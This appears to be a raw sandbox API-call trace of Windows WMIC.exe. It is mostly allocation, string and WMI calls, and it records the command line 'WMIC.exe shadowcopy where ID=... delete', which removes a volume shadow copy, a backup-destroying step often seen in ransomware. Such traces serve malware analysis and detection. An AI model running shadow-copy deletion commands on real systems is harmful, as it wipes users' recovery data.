SysStringLen (param_1="texttablewsys") returned 0xd [0100.366] SysStringLen (param_1="XML") returned 0x3 [0100.366] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0100.366] malloc (_Size=0x30) returned 0x268440 [0100.366] malloc (_Size=0x18) returned 0x26c920 [0100.367] free (_Block=0x26c920) [0100.367] malloc (_Size=0x18) returned 0x26c920 [0100.367] malloc (_Size=0x18) returned 0x26c940 [0100.367] SysStringLen (param_1="htable-sortby") returned 0xd [0100.367] SysStringLen (param_1="TABLE") returned 0x5 [0100.367] SysStringLen (param_1="htable-sortby") returned 0xd [0100.367] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.367] SysStringLen (param_1="htable-sortby") returned 0xd [0100.367] SysStringLen (param_1="XML") returned 0x3 [0100.367] SysStringLen (param_1="htable-sortby") returned 0xd [0100.367] SysStringLen (param_1="texttablewsys") returned 0xd [0100.367] SysStringLen (param_1="htable-sortby") returned 0xd [0100.367] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0100.367] SysStringLen (param_1="XML") returned 0x3 [0100.367] SysStringLen (param_1="htable-sortby") returned 0xd [0100.367] malloc (_Size=0x30) returned 0x268480 [0100.367] malloc (_Size=0x18) returned 0x26c960 [0100.367] free (_Block=0x26c960) [0100.368] malloc (_Size=0x18) returned 0x26c960 [0100.368] malloc (_Size=0x18) returned 0x26c980 [0100.368] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0100.368] SysStringLen (param_1="TABLE") returned 0x5 [0100.368] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0100.368] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.368] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0100.368] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.368] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0100.368] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0100.368] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.368] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0100.368] malloc (_Size=0x30) returned 0x2684c0 [0100.368] malloc (_Size=0x18) returned 0x26c9a0 [0100.368] free (_Block=0x26c9a0) [0100.368] malloc (_Size=0x18) returned 0x26c9a0 [0100.368] malloc (_Size=0x18) returned 0x26c9c0 [0100.368] SysStringLen (param_1="wmiclimofformat") returned 0xf [0100.368] SysStringLen (param_1="TABLE") returned 0x5 [0100.368] SysStringLen (param_1="wmiclimofformat") returned 0xf [0100.369] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.369] SysStringLen (param_1="wmiclimofformat") returned 0xf [0100.369] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.369] SysStringLen (param_1="wmiclimofformat") returned 0xf [0100.369] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0100.369] SysStringLen (param_1="wmiclimofformat") returned 0xf [0100.369] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0100.369] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.369] SysStringLen (param_1="wmiclimofformat") returned 0xf [0100.369] malloc (_Size=0x30) returned 0x268500 [0100.369] malloc (_Size=0x18) returned 0x26c9e0 [0100.369] free (_Block=0x26c9e0) [0100.369] malloc (_Size=0x18) returned 0x26c9e0 [0100.369] malloc (_Size=0x18) returned 0x26ca00 [0100.369] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0100.369] SysStringLen (param_1="TABLE") returned 0x5 [0100.369] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0100.369] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.369] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0100.369] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.369] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0100.369] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0100.369] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0100.370] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0100.370] malloc (_Size=0x30) returned 0x268540 [0100.370] malloc (_Size=0x18) returned 0x26ca20 [0100.370] free (_Block=0x26ca20) [0100.370] malloc (_Size=0x18) returned 0x26ca20 [0100.370] malloc (_Size=0x18) returned 0x26ca40 [0100.370] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0100.370] SysStringLen (param_1="TABLE") returned 0x5 [0100.370] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0100.370] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0100.370] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0100.370] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0100.370] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0100.370] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0100.370] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0100.370] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0100.370] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0100.370] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0100.370] malloc (_Size=0x30) returned 0x268580 [0100.371] FreeThreadedDOMDocument:IUnknown:Release (This=0x1c571d0) returned 0x0 [0100.371] free (_Block=0x266e90) [0100.371] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete" [0100.371] malloc (_Size=0xe0) returned 0x26cd30 [0100.371] memcpy_s (in: _Destination=0x26cd30, _DestinationSize=0xde, _Source=0x2a25be, _SourceSize=0xd0 | out: _Destination=0x26cd30) returned 0x0 [0100.371] malloc (_Size=0x18) returned 0x26ca60 [0100.371] malloc (_Size=0x18) returned 0x26ca80 [0100.371] malloc (_Size=0x18) returned 0x26caa0 [0100.372] malloc (_Size=0x18) returned 0x26cac0 [0100.372] malloc (_Size=0x80) returned 0x266e90 [0100.372] GetLocalTime (in: lpSystemTime=0x1cf6b0 | out: lpSystemTime=0x1cf6b0*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x4, wMilliseconds=0x3b3)) [0100.372] _vsnwprintf (in: _Buffer=0x266e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1cf608 | out: _Buffer="09-04-2020T08:55:04") returned 19 [0100.372] lstrlenW (lpString=" shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete") returned 71 [0100.372] malloc (_Size=0x90) returned 0x2670a0 [0100.372] lstrlenW (lpString=" shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete") returned 71 [0100.372] lstrlenW (lpString=" shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete") returned 71 [0100.372] malloc (_Size=0x90) returned 0x26ce20 [0100.372] lstrlenW (lpString=" shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete") returned 71 [0100.372] lstrlenW (lpString=" shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete") returned 71 [0100.372] lstrlenW (lpString=" shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete") returned 71 [0100.372] malloc (_Size=0x16) returned 0x26cae0 [0100.372] lstrlenW (lpString="shadowcopy") returned 10 [0100.372] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0100.372] malloc (_Size=0x16) returned 0x26cb00 [0100.372] malloc (_Size=0x8) returned 0x267140 [0100.372] free (_Block=0x0) [0100.372] free (_Block=0x26cae0) [0100.372] lstrlenW (lpString=" shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete") returned 71 [0100.372] malloc (_Size=0xc) returned 0x26cae0 [0100.372] lstrlenW (lpString="where") returned 5 [0100.373] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0100.373] malloc (_Size=0xc) returned 0x26cb20 [0100.373] malloc (_Size=0x10) returned 0x26cb40 [0100.373] memmove_s (in: _Destination=0x26cb40, _DestinationSize=0x8, _Source=0x267140, _SourceSize=0x8 | out: _Destination=0x26cb40) returned 0x0 [0100.373] free (_Block=0x267140) [0100.373] free (_Block=0x0) [0100.373] free (_Block=0x26cae0) [0100.373] lstrlenW (lpString=" shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete") returned 71 [0100.373] malloc (_Size=0x5c) returned 0x26cec0 [0100.373] lstrlenW (lpString="\"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\"") returned 45 [0100.373] _wcsicmp (_String1="\"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\"", _String2="\"NULL\"") returned -5 [0100.373] lstrlenW (lpString="\"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\"") returned 45 [0100.373] lstrlenW (lpString="\"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\"") returned 45 [0100.373] malloc (_Size=0x5c) returned 0x26cf30 [0100.373] malloc (_Size=0x18) returned 0x26cae0 [0100.373] memmove_s (in: _Destination=0x26cae0, _DestinationSize=0x10, _Source=0x26cb40, _SourceSize=0x10 | out: _Destination=0x26cae0) returned 0x0 [0100.373] free (_Block=0x26cb40) [0100.373] free (_Block=0x0) [0100.373] free (_Block=0x26cec0) [0100.373] lstrlenW (lpString=" shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete") returned 71 [0100.373] malloc (_Size=0xe) returned 0x26cb40 [0100.373] lstrlenW (lpString="delete") returned 6 [0100.373] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0100.373] malloc (_Size=0xe) returned 0x26cb60 [0100.373] malloc (_Size=0x20) returned 0x26cec0 [0100.373] memmove_s (in: _Destination=0x26cec0, _DestinationSize=0x18, _Source=0x26cae0, _SourceSize=0x18 | out: _Destination=0x26cec0) returned 0x0 [0100.373] free (_Block=0x26cae0) [0100.373] free (_Block=0x0) [0100.373] free (_Block=0x26cb40) [0100.373] malloc (_Size=0x20) returned 0x26cef0 [0100.374] lstrlenW (lpString="QUIT") returned 4 [0100.374] lstrlenW (lpString="shadowcopy") returned 10 [0100.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0100.374] lstrlenW (lpString="EXIT") returned 4 [0100.374] lstrlenW (lpString="shadowcopy") returned 10 [0100.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0100.374] free (_Block=0x26cef0) [0100.374] WbemLocator:IUnknown:AddRef (This=0x1da1390) returned 0x2 [0100.374] malloc (_Size=0x20) returned 0x26cef0 [0100.374] lstrlenW (lpString="/") returned 1 [0100.374] lstrlenW (lpString="shadowcopy") returned 10 [0100.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0100.374] lstrlenW (lpString="-") returned 1 [0100.374] lstrlenW (lpString="shadowcopy") returned 10 [0100.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0100.374] lstrlenW (lpString="CLASS") returned 5 [0100.374] lstrlenW (lpString="shadowcopy") returned 10 [0100.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0100.374] lstrlenW (lpString="PATH") returned 4 [0100.374] lstrlenW (lpString="shadowcopy") returned 10 [0100.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0100.374] lstrlenW (lpString="CONTEXT") returned 7 [0100.374] lstrlenW (lpString="shadowcopy") returned 10 [0100.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0100.374] lstrlenW (lpString="shadowcopy") returned 10 [0100.374] malloc (_Size=0x16) returned 0x26cb40 [0100.374] lstrlenW (lpString="shadowcopy") returned 10 [0100.375] GetCurrentThreadId () returned 0xa70 [0100.375] ??0CHString@@QEAA@XZ () returned 0x1cf4c0 [0100.375] malloc (_Size=0x18) returned 0x26cae0 [0100.375] malloc (_Size=0x18) returned 0x26cb80 [0100.375] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1da1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff232998 | out: ppNamespace=0xff232998*=0x1db3a98) returned 0x0 [0100.391] free (_Block=0x26cb80) [0100.391] free (_Block=0x26cae0) [0100.391] CoSetProxyBlanket (pProxy=0x1db3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0100.392] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0100.392] GetCurrentThreadId () returned 0xa70 [0100.392] ??0CHString@@QEAA@XZ () returned 0x1cf358 [0100.392] malloc (_Size=0x18) returned 0x26cae0 [0100.392] malloc (_Size=0x18) returned 0x26cb80 [0100.392] malloc (_Size=0x18) returned 0x26cba0 [0100.392] malloc (_Size=0x18) returned 0x26cbc0 [0100.392] SysStringLen (param_1="root\\cli") returned 0x8 [0100.392] SysStringLen (param_1="\\") returned 0x1 [0100.392] malloc (_Size=0x18) returned 0x26cbe0 [0100.392] SysStringLen (param_1="root\\cli\\") returned 0x9 [0100.392] SysStringLen (param_1="ms_409") returned 0x6 [0100.392] free (_Block=0x26cbc0) [0100.392] free (_Block=0x26cba0) [0100.392] free (_Block=0x26cb80) [0100.392] free (_Block=0x26cae0) [0100.392] malloc (_Size=0x18) returned 0x26cae0 [0100.392] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1da1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff2329a0 | out: ppNamespace=0xff2329a0*=0x1db3b28) returned 0x0 [0100.397] free (_Block=0x26cae0) [0100.397] free (_Block=0x26cbe0) [0100.397] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0100.397] GetCurrentThreadId () returned 0xa70 [0100.397] ??0CHString@@QEAA@XZ () returned 0x1cf4d0 [0100.397] malloc (_Size=0x18) returned 0x26cbe0 [0100.397] malloc (_Size=0x18) returned 0x26cae0 [0100.397] malloc (_Size=0x18) returned 0x26cb80 [0100.397] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0100.397] malloc (_Size=0x3a) returned 0x26cfa0 [0100.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1c1980, cbMultiByte=-1, lpWideCharStr=0x26cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0100.398] free (_Block=0x26cfa0) [0100.398] malloc (_Size=0x18) returned 0x26cba0 [0100.398] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0100.398] SysStringLen (param_1="shadowcopy") returned 0xa [0100.398] malloc (_Size=0x18) returned 0x26cbc0 [0100.398] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0100.398] SysStringLen (param_1="'") returned 0x1 [0100.398] free (_Block=0x26cba0) [0100.398] free (_Block=0x26cb80) [0100.398] free (_Block=0x26cae0) [0100.398] free (_Block=0x26cbe0) [0100.398] IWbemServices:GetObject (in: This=0x1db3a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x1cf4d8*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf4d8*=0x1dc04e0, ppCallResult=0x0) returned 0x0 [0100.415] malloc (_Size=0x18) returned 0x26cbe0 [0100.415] IWbemClassObject:Get (in: This=0x1dc04e0, wszName="Target", lFlags=0, pVal=0x1cf400*(varType=0x0, wReserved1=0xff23, wReserved2=0x0, wReserved3=0x0, varVal1=0xff232998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf400*(varType=0x8, wReserved1=0xff23, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.416] free (_Block=0x26cbe0) [0100.416] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0100.416] malloc (_Size=0x3e) returned 0x26cfa0 [0100.416] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0100.416] malloc (_Size=0x18) returned 0x26cbe0 [0100.416] IWbemClassObject:Get (in: This=0x1dc04e0, wszName="PWhere", lFlags=0, pVal=0x1cf400*(varType=0x0, wReserved1=0xff23, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ce298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf400*(varType=0x8, wReserved1=0xff23, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.416] free (_Block=0x26cbe0) [0100.416] lstrlenW (lpString=" Where ID = '#'") returned 15 [0100.416] malloc (_Size=0x20) returned 0x26cff0 [0100.416] lstrlenW (lpString=" Where ID = '#'") returned 15 [0100.416] malloc (_Size=0x18) returned 0x26cbe0 [0100.416] IWbemClassObject:Get (in: This=0x1dc04e0, wszName="Connection", lFlags=0, pVal=0x1cf400*(varType=0x0, wReserved1=0xff23, wReserved2=0x0, wReserved3=0x0, varVal1=0x31bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf400*(varType=0xd, wReserved1=0xff23, wReserved2=0x0, wReserved3=0x0, varVal1=0x1dc09c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.417] free (_Block=0x26cbe0) [0100.417] IUnknown:QueryInterface (in: This=0x1dc09c0, riid=0xff1c7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1cf3f0 | out: ppvObject=0x1cf3f0*=0x1dc09c0) returned 0x0 [0100.417] GetCurrentThreadId () returned 0xa70 [0100.417] ??0CHString@@QEAA@XZ () returned 0x1cf318 [0100.417] malloc (_Size=0x18) returned 0x26cbe0 [0100.417] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="Namespace", lFlags=0, pVal=0x1cf340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff1d738f, varVal2=0x26cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf340*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x26cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.417] free (_Block=0x26cbe0) [0100.417] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0100.417] malloc (_Size=0x16) returned 0x26cbe0 [0100.417] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0100.417] malloc (_Size=0x18) returned 0x26cae0 [0100.417] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="Locale", lFlags=0, pVal=0x1cf340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34a648, varVal2=0x26cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf340*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x26cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.417] free (_Block=0x26cae0) [0100.417] lstrlenW (lpString="ms_409") returned 6 [0100.417] malloc (_Size=0xe) returned 0x26cae0 [0100.418] lstrlenW (lpString="ms_409") returned 6 [0100.418] malloc (_Size=0x18) returned 0x26cb80 [0100.418] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="User", lFlags=0, pVal=0x1cf340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34a648, varVal2=0x26cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf340*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34a648, varVal2=0x26cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.418] free (_Block=0x26cb80) [0100.418] malloc (_Size=0x18) returned 0x26cb80 [0100.418] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="Password", lFlags=0, pVal=0x1cf340*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34a648, varVal2=0x26cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf340*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34a648, varVal2=0x26cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.418] free (_Block=0x26cb80) [0100.418] malloc (_Size=0x18) returned 0x26cb80 [0100.418] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="Server", lFlags=0, pVal=0x1cf340*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34a648, varVal2=0x26cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf340*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x26cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.418] free (_Block=0x26cb80) [0100.418] lstrlenW (lpString=".") returned 1 [0100.418] malloc (_Size=0x4) returned 0x267140 [0100.418] lstrlenW (lpString=".") returned 1 [0100.418] malloc (_Size=0x18) returned 0x26cb80 [0100.419] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="Authority", lFlags=0, pVal=0x1cf340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34a648, varVal2=0x26cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf340*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34a648, varVal2=0x26cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.420] free (_Block=0x26cb80) [0100.420] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0100.420] IUnknown:Release (This=0x1dc09c0) returned 0x1 [0100.420] GetCurrentThreadId () returned 0xa70 [0100.420] ??0CHString@@QEAA@XZ () returned 0x1cf318 [0100.420] malloc (_Size=0x18) returned 0x26cb80 [0100.420] IWbemClassObject:Get (in: This=0x1dc04e0, wszName="__RELPATH", lFlags=0, pVal=0x1cf340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf340*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0100.420] free (_Block=0x26cb80) [0100.420] malloc (_Size=0x18) returned 0x26cb80 [0100.420] GetCurrentThreadId () returned 0xa70 [0100.420] ??0CHString@@QEAA@XZ () returned 0x1cf198 [0100.420] ??0CHString@@QEAA@PEBG@Z () returned 0x1cf1b0 [0100.420] ??0CHString@@QEAA@AEBV0@@Z () returned 0x1cf140 [0100.420] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0100.420] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x26d020 [0100.420] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0100.420] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf100 [0100.420] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf148 [0100.420] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf1b0 [0100.421] ??1CHString@@QEAA@XZ () returned 0x4e97fe01 [0100.421] ??1CHString@@QEAA@XZ () returned 0x4e97fe01 [0100.421] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf108 [0100.421] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf140 [0100.421] ??1CHString@@QEAA@XZ () returned 0x1 [0100.421] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x26d090 [0100.421] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0100.421] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf100 [0100.421] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf148 [0100.421] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf1b0 [0100.421] ??1CHString@@QEAA@XZ () returned 0x4e97fe01 [0100.421] ??1CHString@@QEAA@XZ () returned 0x4e97fe01 [0100.421] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf108 [0100.421] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf140 [0100.421] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0100.421] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0100.421] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0100.421] malloc (_Size=0x18) returned 0x26cba0 [0100.421] malloc (_Size=0x18) returned 0x26cc00 [0100.421] malloc (_Size=0x18) returned 0x26cc20 [0100.421] malloc (_Size=0x18) returned 0x26cc40 [0100.421] malloc (_Size=0x18) returned 0x26cc60 [0100.421] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0100.421] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0100.421] malloc (_Size=0x18) returned 0x26cc80 [0100.421] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0100.422] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0100.422] malloc (_Size=0x18) returned 0x26cca0 [0100.422] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0100.422] SysStringLen (param_1="\"") returned 0x1 [0100.422] free (_Block=0x26cc80) [0100.422] free (_Block=0x26cc60) [0100.422] free (_Block=0x26cc40) [0100.422] free (_Block=0x26cc20) [0100.422] free (_Block=0x26cc00) [0100.422] free (_Block=0x26cba0) [0100.422] IWbemServices:GetObject (in: This=0x1db3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x1cf188*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf188*=0x1dc0a50, ppCallResult=0x0) returned 0x0 [0100.426] malloc (_Size=0x18) returned 0x26cba0 [0100.426] IWbemClassObject:Get (in: This=0x1dc0a50, wszName="Text", lFlags=0, pVal=0x1cf1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff232ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf1c0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x344aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ce030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0100.426] free (_Block=0x26cba0) [0100.426] SafeArrayGetLBound (in: psa=0x344aa0, nDim=0x1, plLbound=0x1cf1a0 | out: plLbound=0x1cf1a0) returned 0x0 [0100.426] SafeArrayGetUBound (in: psa=0x344aa0, nDim=0x1, plUbound=0x1cf190 | out: plUbound=0x1cf190) returned 0x0 [0100.426] SafeArrayGetElement (in: psa=0x344aa0, rgIndices=0x1cf184, pv=0x1cf1d8 | out: pv=0x1cf1d8) returned 0x0 [0100.426] malloc (_Size=0x18) returned 0x26cba0 [0100.427] malloc (_Size=0x18) returned 0x26cc00 [0100.427] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0100.427] free (_Block=0x26cba0) [0100.427] IUnknown:Release (This=0x1dc0a50) returned 0x0 [0100.427] free (_Block=0x26cca0) [0100.427] ??1CHString@@QEAA@XZ () returned 0x4e97fe01 [0100.427] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0100.427] free (_Block=0x26cb80) [0100.427] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0100.427] lstrlenW (lpString="Shadow copy management.") returned 23 [0100.427] malloc (_Size=0x30) returned 0x2685c0 [0100.427] lstrlenW (lpString="Shadow copy management.") returned 23 [0100.427] free (_Block=0x26cc00) [0100.427] IUnknown:Release (This=0x1dc04e0) returned 0x0 [0100.427] free 